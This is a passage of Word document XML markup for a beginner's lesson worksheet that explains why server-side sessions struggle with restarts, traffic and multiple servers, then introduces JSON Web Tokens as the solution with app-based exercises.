            <w:tcW w:type="dxa" w:w="3560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">What Actually Happens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Real-World Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🔴</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0022"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Server Restart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">All RAM is wiped. Every session is gone. Every user is instantly logged out — even if they were mid-transaction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Netflix goes down for maintenance. Every viewer is logged out and must log in again.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserv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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0022"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">High Traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">1 million users × 2 KB per session = 2 GB of RAM just to remember who is logged in. RAM is expensive.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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A viral event causes huge traffic. The server runs out of memory and crashes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🔵</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0022"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Multiple Servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">User logs in on Server A. Next request goes to Server B (load balancer). Server B has no record → user is kicked out.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Modern apps run on 10–100 servers. Sessions break unless you use expensive "sticky sessions" or shared databases.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B75" w:sz="4"/>
              <w:left w:val="single" w:color="006B75" w:sz="24"/>
              <w:bottom w:val="single" w:color="006B75" w:sz="4"/>
              <w:right w:val="single" w:color="006B75" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E0F4F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006B75"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✏️  THINK ABOUT IT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">After seeing all three problems — which one do you think is the most serious, and why?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Hint: Think about a real app like WhatsApp or an online bank.</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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Most serious problem:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Because:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pP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Borders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D5C2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="34"/>
                <w:szCs w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT Authentication — The Solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">What is JWT?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT stands for JSON Web Token.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is an open standard (RFC 7519) that defines a compact, self-contained way to securely transmit information between two parties as a digitally signed token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">But forget the technical definition for a moment. Here is the simple idea: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875A" w:sz="4"/>
              <w:left w:val="single" w:color="00875A" w:sz="20"/>
              <w:bottom w:val="single" w:color="00875A" w:sz="4"/>
              <w:right w:val="single" w:color="00875A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT = "You prove your identity. The server does not remember you."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of the server storing a list of everyone who is logged in, the server gives you a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">signed digital token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you log in. You carry this token with you. You show it on every request. The server just </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">verifies the token is genuine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — no memory needed, no lookup in a database.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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Go to Module 03 in the app.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click  ▶ Animate JWT Flow  — watch each of the 7 steps light up in green.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">After it finishes, click  ▶ Send Token  — observe the token flying across the animation.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Notice: the token moves from left (client) to right (server) on every request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
